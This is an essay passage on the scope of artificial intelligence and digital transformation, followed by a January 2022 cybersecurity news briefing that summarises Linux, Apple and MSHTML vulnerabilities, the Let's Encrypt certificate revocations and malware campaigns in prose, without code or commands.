Secondly, there is the fact that Artificial Intelligence is not a new concept, meaning mal judgment has formed over many decades; in fact, it has existed since 1956. Over these years there have been different waves (such as the introduction of expert systems in the 80’s and the explosion of the internet in the 90’s). In each period, expectations have been greater than reality and there have been “troughs of disillusionment” the third phase of Gartner’s “Hype Cycle”.

Figura 1: Curva de Gartner. (De IOTpreneur , CC BY-SA 4.0)
Figure 1: Gartner Curve. (From IOTpreneur , CC BY-SA 4.0)

We currently find ourselves in a period of high expectations with respect to AI. Big companies are promising innovation beyond what we could have imagined 20 years ago. Some technological leaders talk about the dangers and impact that automation, robotics and AI might have on our lives and future jobs. Despite this, each day we are seeing more and more technologies that make our lives easier. These advancements, that help people see the reality of the technology may help to reduce the “baggage” of negative connotations surrounding the future of AI.

What areas does AI encompass?

AI is an ecosystem, where we can include technologies such as data mining, natural language processing (NLP), Deep Learning, Predictive and Prescriptive Analysis and many more. In this ecosystem we also find technologies that regularly assist in our daily lives such as recommendation systems which Netflix and AirBnb base themselves on.

All of these technologies are characterized by generating data which, if analyzed correctly, can offer great value and understanding. Due to this, one can say that artificial intelligence lies at the convergence of all these solutions.

Additionally, AI is closely linked to the four pillars of innovation and digital transformation: cloud computing, mobility, social analytics and Big Data as it powers some of the main accelerators of this transformation; including Cloud Computing, Cognitive Systems, the Internet of Things (IoT), Cybersecurity and Big Data technologies.

Digital transformation pillars

The technology sector is transforming into a sector of understanding. In order to take anything away from this understanding it is important to have technologies and “real-life” applications that are deeply connected. This is what we call the “digital economy”. As mentioned earlier, this transformation is based on four fundamental pillars:

  • Cloud computing
  • Mobility
  • Social Analytics
  • Big Data Analytics

These technologies and innovations are the true driving forces behind a digital transformation and they are so closely tied with AI that they sometimes get confused with AI itself. These four pillars support the “accelerators” of innovation.

The main accelerators are:

  • Cognitive services
  • Cybersecurity
  • IoT
  • Big Data

Cognitive services

All of these technologies are ever-present in our daily lives. Cognitive services aim to imitate rational human processes. They analyze large amounts of data that is created by connected systems, and offer tools that have diagnostic, predictive and prescriptive capabilities that are capable of observing, learning and offering Insights. They are closely orientated with the contextual and human interaction. For this, the challenge for Artificial Intelligence is to design the technology so that people can interact with it naturally. This involves developing applications with “human behavior”, such as:

  • Listening and speaking, or rather the ability to turn audio to text and text to audio
  • Natural Language Processing (NLP). Text is not just a combination of keywords, a computer needs to understand grammatical and contextual connections too
  • Understanding emotions and feelings (“sentiment analysis”). To create empathetic systems capable of understanding the emotional state of a person and to make decisions based on this.
  • Image recognition. This consists of finding and identifying objects in an image or video sequence. It is a simple task for humans, but a real challenge for machines.

Cybersecurity

Cybersecurity is also moving towards a more holistic focus, one that considers its environment and a more human dimension. Above all, it is becoming more proactive. Rather than waiting for a cyber-attack to happen, the key is in prediction and prevention. Now, AI can be used to detect patterns in the data and take action when alerts arise.

Internet of Things and Big Data

What about the Internet of Things and Big Data? In this case, the amount of data that is being created is clear, as is the fact that it is happening rapidly and often in unstructured forms. This can include data from IoT sensors, social networks, text files, images, videos and sound. Now AI tools such as data mining, machine learning and NLP mean that it is possible to turn this data into useful information.

Artificial Intelligence is a very broad term and encompasses many processes and technologies that can be applied in various industries. Companies must be able to explain simply the type of AI they are incorporating inorder to displace confusion surrounding the terms, which will make it a more accesible technology.

Cyber Security Weekly Briefing 22-28 January

Telefónica Tech    28 January, 2022

New vulnerabilities in Linux

Two new vulnerabilities of risk have recently been disclosed and are reportedly affecting Linux systems. If exploited, they could allow privilege escalation on the vulnerable system.

  • CVE-2021-4034 (PwnKit): Researchers at Qualys have discovered a memory corruption flaw, which resides in polkit’s pkexec program and could allow a local attacker to escalate privileges on a vulnerable system and reach root privileges. Hours after the disclosure of the Qualys article, the first proof-of- concept (PoC) was made public, which would allow this flaw to be exploited. Qualys recommends applying the available patches that the authors of Polkit have published in Gitlab.
  • CVE-2022-0185: Buffer overflow vulnerability, which resides in the Linux kernel and could allow an attacker to escape from the Kubernetes containers and take control of the node, with the CAP_SYS_ADMIN privilege enabled as a requirement. The researchers highlight that exploitation of this flaw is straightforward, so they recommend updating as soon as possible. Crusaders of Rust (CoR), the team that discovered the flaw, has revealed that they will publish the exploit code in the coming weeks on their Github repository.

More info: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

Let’s Encrypt SSL/TLS certificates revoked due to implementation error

Let’s Encrypt has announced in a statement that it will revoke certain SSL/TLS certificates on January 28th due to two irregularities in the implementation of the validation method. According to the statement, this will only affect certificates that were issued and validated using the TLS-ALPN-01 challenge before February 26th at 00:48 UTC, when the implementation error was corrected. They also indicate that this will only affect less than 1% of the certificates. Let’s Encrypt will communicate to affected users the guidelines they will have to follow to renew their certificates. It should be noted that this is not the first time Let’s Encrypt has faced a problem of this kind, as in October 2021 the DST Root CA X3 root certificates expired.

All the details: https://community.letsencrypt.org/t/2022-01-25-issue-with-tls-alpn-01-validation-method/170450

Espionage campaign using OneDrive as C2

Researchers at Trellix have published details of a multi-phased espionage campaign targeting high-ranking government officials and defence employees in West Asia. The campaign began in October, but the preparation of the infrastructure could date back as far as June. The input vector would be an Excel document, possibly sent by email, which exploits a remote code execution vulnerability in MSHTML (CVE-2021-40444), fixed by Microsoft in its September update bulletin. This exploit allows the deployment of a malware known as Graphite, which uses the Microsoft Graph API in order to use OneDrive as a Command & Control server. Once the connection to the C2 is established, Empire, an open-source post-exploitation framework widely used for illicit purposes, is downloaded. Due to the multiple stages of the infection chain, which facilitate evasion, as well as the use of new techniques including OneDrive as C2 to ensure that all connections are made to legitimate Microsoft domains, we could say that we are dealing with a highly sophisticated campaign. Based on the targets, researchers point to a possible attribution to APT28 (aka Sofacy, Strontium, Fancy Bear or Sednit) of Russian origin.

All info: https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html

​​Apple fixes new 0-day exploit used to breach iOS devices

Apple has released new security updates for iOS 15.3 y iPadOS 15.3, as well as macOS Monterey 12.2, in which it has fixed two 0-day vulnerabilities.

  • The first of the flaws, identified as CVE-2022-22587, is a memory corruption flaw in the IOMobileFrameBuffer that affects iOS, iPadOS and macOS Monterey. Successful exploitation of this vulnerability could allow arbitrary code execution with kernel privileges on compromised devices. Apple highlights that the flaw is being actively exploited.
  • The second 0-day, a flaw in Safari WebKit on iOS and iPadOS, would allow websites to track browsing activity and user identity in real time. This vulnerability, classified as CVE-2022-22594, was first discovered by Martin Bajanik of FingerprintJS on November 28th, but was only published on January 14th and fixed in this update.

Discover more: https://support.apple.com/en-us/HT213053

​​Trickbot strengthens protections to evade detection and analysis

IBM Trusteer researchers have analysed recent Trickbot malware campaigns, in which the operators behind the trojan have added additional layers of protection to their injections to avoid detection and analysis. These code injections are used in real time when a user with an infected device tries to access their bank account, the injections are designed to intercept and modify information leaving the browser before it reaches the bank’s server. Most of the samples in which these new capabilities have been detected have been applied in cases of bank fraud, one of Trickbot’s main activities. The implemented updates include a new server-side injection mechanism, encrypted communications with the C2 (Command&Control), an anti-debugging feature and new ways to obfuscate and hide the injected code. On the other hand, security researchers have reported that the operators of Emotet, malware that previously infects the device to distribute malware as trickbot in a second phase, have also improved their evasion techniques by using hexadecimal and octal IP addresses, reportedly using the same Webshells provider as TR with Qakbot or Squirrelwaffle. They have identified up to 138 sites compromised by this malware.

All the details: https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/